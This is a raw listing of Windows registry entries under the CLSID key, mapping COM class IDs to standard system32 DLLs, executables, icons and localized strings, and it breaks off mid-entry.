HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{44A50F5F-78E2-4D17-930C-68BB9F69EC9E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{44CB442B-9DA9-49df-B3FD-023777B16E50}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfnetcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{44EC053A-400F-11D0-9DCD-00A0C90391D3}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\atl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{44f3dab6-4392-4186-bb7b-6282ccb7a9f6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mydocs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{44F9A03B-A3EC-4F3B-9364-08E0007F21DF}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-22914 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-9227 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,-235 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4522c772-9a2b-4920-ad7f-62d3d15eac52}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{453D9F45-B2A2-4DF0-B42A-51A3AEC86452}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4545dea0-2dfc-4906-a728-6d986ba399a9}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ThumbnailExtractionHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{455F24E9-7396-4A16-9715-7C0FDBE3EFE3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{455f6102-c83a-4d07-ba36-b6da9d589ae2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tsmf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4564b25e-30cd-4787-82ba-39e73a750b14}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4582EBA9-6AA1-4D79-824E-728929EF455D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F812-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\fastprox.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{45BA127D-10A8-46EA-8AB7-56EA9078943C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\twinui.appcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{45FD65ED-6BC2-47ae-B391-9E2B79F07C52}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\systemcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{45ffc283-e417-4bc2-b0b8-6654081d10d7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingsHandlers_SignInOptions.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{46031ba1-083f-47d9-8369-23c92bdab2ff}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{461CDD3F-D54E-4033-A0AA-6CD24F152AA1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wlandlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{461DED9E-81D5-494F-BC96-6432C8645733}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4655840e-ab1a-49d0-a4c4-261fa1c20e86}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpncore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4657278A-411B-11d2-839A-00C04FD918D0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{46615ACE-28BC-47A8-8176-3713A64C9FDC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{466936A9-E281-45E6-A239-9FE53D07B4A5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\LockScreenContent.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{469afbdf-084f-4dc9-904f-9e824c48bc37}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{46C166AA-3108-11D4-9348-00C04F8EEB71} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\hnetcfgclient.dll,-201 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{46C166AA-3108-11D4-9348-00C04F8EEB71}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\netshell.dll,-5 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{46C166AA-3108-11D4-9348-00C04F8EEB71}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hnetcfgclient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{46CB32FA-B5CA-8A3A-62CA-A7023C0496C5} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\ieframe.dll,-39184 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{46CF315B-2D3A-4765-852A-6500C42D9865}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4705A6B4-E4CB-4ed1-AF8D-851C644A0459}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{47206204-5ECA-11D2-960F-00C04F8EE628}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{474C98EE-CF3D-41f5-80E3-4AAB0AB04301}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4753da60-5b71-11cf-b035-00aa006e0975}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{477EC299-1421-4bdd-971F-7CCB933F21AD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{47B706B0-B103-4AFD-8ECF-16C2DDF81C15}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wbem\netnccim.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{47B73B70-1964-444A-B390-FAB1565DCAA3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{47D35BB4-71CC-4810-9669-D03D9FF7CEAF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceDriverRetrievalClient.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{47D4D946-62E8-11cf-93BC-444553540000}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dsound.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{47DFBE54-CF76-11D3-B38F-00105A1F473A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemdisp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{47e30d54-dac1-473a-aff7-2355bf78881f}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ngctasks.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{480FF4B0-28B2-11D1-BEF7-00C04FBF8FEF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmusic.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48123BC4-99D9-11D1-A6B3-00C04FD91555}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48123BC4-99D9-11D1-A6B3-00C04FD91555}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{483afb5d-70df-4e16-abdc-a1de4d015a3e}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\azroles.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48527bb3-e8de-450b-8910-8c4099cb8624}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4876DC0E-F963-4227-9A8F-19872B75D231}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\StorageContextHandler.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{487af411-1d5e-4f7f-b4f4-4721fe1e95d9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{487BA7B8-4DB0-465F-B122-C74A445A095D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{488C2839-8ABA-4368-B4DF-8EF11CF99F99}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{489331DC-F5E0-4528-9FDA-45331BF4A571}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSATAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{489AE5DA-059A-4aca-93E5-7B7CFD1BD752}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmcsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48C6BE7C-3871-43cc-B46F-1449A1BB2FF3}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscobj.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48da6741-1bf0-4a44-8325-293086c79077}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\iasdatastore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48DE828C-730C-49AF-AE84-759C609911EE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48E277F6-4E74-4cd6-BA6F-FA4F42898223}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SearchFolder.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48e2ed0f-98c2-4a37-bed5-166312ddd83f}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfreadwrite.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48e7caab-b918-4e58-a94d-505519c795dc} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-21786 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48e7caab-b918-4e58-a94d-505519c795dc}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48e7caab-b918-4e58-a94d-505519c795dc}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48F4CE0C-BC11-4C9B-A165-2097308F9C25}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wpncore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{494C063B-1024-4DD1-89D3-713784E82044}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\spool\tools\PrintBrmEngine.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4955DD33-B159-11D0-8FCF-00AA006BCC59}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\msimtf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{496241E9-161B-4007-AF56-B4E006F65FA9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppxPackaging.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4988dd22-ccec-48ec-9271-5951e8653903}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ttlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{498A0351-BA2F-46DD-96D9-C19988FEA0C4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AppLockerCsp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49A832D7-C7B3-4556-8716-5BDC745C3C1B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49B2791A-B1AE-4C90-9B8E-E860BA07F889}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe ServerExecutable REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49BD2028-1523-11D1-AD79-00C04FD8FDFF}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\unsecapp.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49C407EF-78B9-4C82-A40B-2FE02F8E771D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49eb6558-c09c-46dc-8668-1f848c290d0b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49EBD8BE-1A92-4A86-A651-70AC565E0FEB}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\TelephonyInteractiveUser.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49F371E1-8C5C-4d9c-9A3B-54A6827F513C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4a04656d-52aa-49de-8a09-cb178760e748}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4A1E5ACD-A108-4100-9E26-D2FAFA1BA486}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\icsigd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4A65D267-1539-4BD1-921D-1C49B3E58EB7}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcndmgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4a698512-80cc-4b0e-8ae6-f394ef39f9d0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4A6B8BAD-9872-4525-A812-71A52367DC17} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\rasdlg.dll,-361 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4A6B8BAD-9872-4525-A812-71A52367DC17}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\rasdlg.dll,-562 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4A6B8BAD-9872-4525-A812-71A52367DC17}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4A6CBDD0-0922-4463-A2AB-D8F8E21F4A86}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\prntvpt.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4a714c8e-e664-4024-9c74-1a82a3da842a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\authui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4a76b469-7b66-4dd4-ba2d-ddf244c766dc}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfcore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4a7ded0a-ad25-11d0-98a8-0800361b1103}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mydocs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4AA0A5C4-1B9B-4F2E-99D7-99C6AEC83474}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4ac6c205-2853-4bf5-b47c-919a42a48a16}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4AF3F4A4-06C8-4B79-A523-633CC65CE297}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmipdskq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4AF4A5FC-912A-11D1-B945-00A0C90312E1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4B0A2997-E555-4F84-B45B-68AB8BC57635}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\rdpendp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4B314A47-12E0-4d52-95FE-084B9224DD4F}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\umpowmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4b360c3c-d284-4384-abcc-ef133e1445da} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\ieframe.dll,-55341 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4B534112-3AF6-4697-A77C-D62CE9B9E7CF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SyncCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4B59AFCC-B8C3-408A-B670-89E5FAB6FDA7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4B966436-6781-4906-8035-9AF94B32C3F7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\spp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4BB24BC2-ABFD-433D-935F-5950B42A4B3F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4BC67F23-D805-4384-BCA3-6F1EDFF50E2C} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\werconcpl.dll,-350 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4BC67F23-D805-4384-BCA3-6F1EDFF50E2C}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\werconcpl.dll,-6 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4bc70a10-fbab-4ada-8fc4-e4f898a6f810}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4BCCBCE4-20E8-44A1-A170-C9A4D941CBA4}\InprocServer32 (Default) REG_EXPAND_SZ %SYSTEMROOT%\System32\wbem\dnsclientcim.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4BDAFC52-FE6A-11d2-93F8-00105A11164A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmintf.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4bec2015-bfa1-42fa-9c0c-59431bbe880e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4bf684f8-3d29-4403-810d-494e72c4291b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C1FC63A-695C-47E8-A339-1A194BE3D0B8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UIAnimation.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C3624D8-57AF-11E1-B779-E5CC4724019B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C5EBD71-431C-43A0-B93C-3EBF917B540F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C5EF749-A380-44FE-853D-FF928F2CD1AE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C60517F-C1F8-473A-B1D8-247952876A5A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4c649c49-c48f-4222-9a0d-cbbf4231221d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\photowiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C6F940C-3CFE-11D2-9EE7-00C04F797396}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4c892621-6757-4fe0-ad8c-a6301be7fba2}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll,7 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4c892621-6757-4fe0-ad8c-a6301be7fba2}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C8A0917-F587-4ECF-9C89-48147528F4E1}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C8CC9CB-80CA-4e16-9F60-F5EB55092361}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4CB43D7F-7EEE-4906-8698-60DA1C38F2FE} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63516 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4CBE39A3-BD8A-4D51-9BD3-B7853737FD93}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4ce6767d-e09b-45dc-831d-20c8b4ea9a26}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4CFC7932-0F9D-4BEF-9C32-8EA2A6B56FCB}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmidcprv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4D111E08-CBF7-4f12-A926-2C7920AF52FC} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-4269 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4D111E08-CBF7-4f12-A926-2C7920AF52FC}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\imageres.dll,-109 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4D111E08-CBF7-4f12-A926-2C7920AF52FC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4d4dedaa-43c5-480d-9ee0-1464f9f4ff4b}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsvr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4d56df98-e082-4bf4-9a09-df655d8427b6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4D728E35-16FA-4320-9E8B-BFD7100A8846}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4DC9C264-730E-4CF6-8374-70F079E4F82B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pwsso.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4DD1D1C3-B36A-4eb4-AAEF-815891A58A30}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\wiaaut.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4DD441AD-526D-4A77-9F1B-9841ED802FB0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4DE225BF-CF59-4CFC-85F7-68B90F185355}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprvsd.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4de7016c-5ef9-11d1-8c13-00c04fd8d503}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\adsmsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4df0c730-df9d-4ae3-9153-aa6b82e9795a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4DF929E7-4C5E-4587-A598-7ED7B3D6E462} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\modemui.dll,-20100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4DF929E7-4C5E-4587-A598-7ED7B3D6E462}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\System32\mdminst.dll,-5100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4DF929E7-4C5E-4587-A598-7ED7B3D6E462}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UICOM.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4E0680A0-A0A2-11D0-8821-00A0C903B83C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certenc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4E14FBA2-2E22-11D1-9964-00C04FBBB345}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\es.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4e3c6645-b839-4a06-a27b-0190f9e6a0af}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4E40F770-369C-11d0-8922-00A024AB2DBB}\InProcServer32 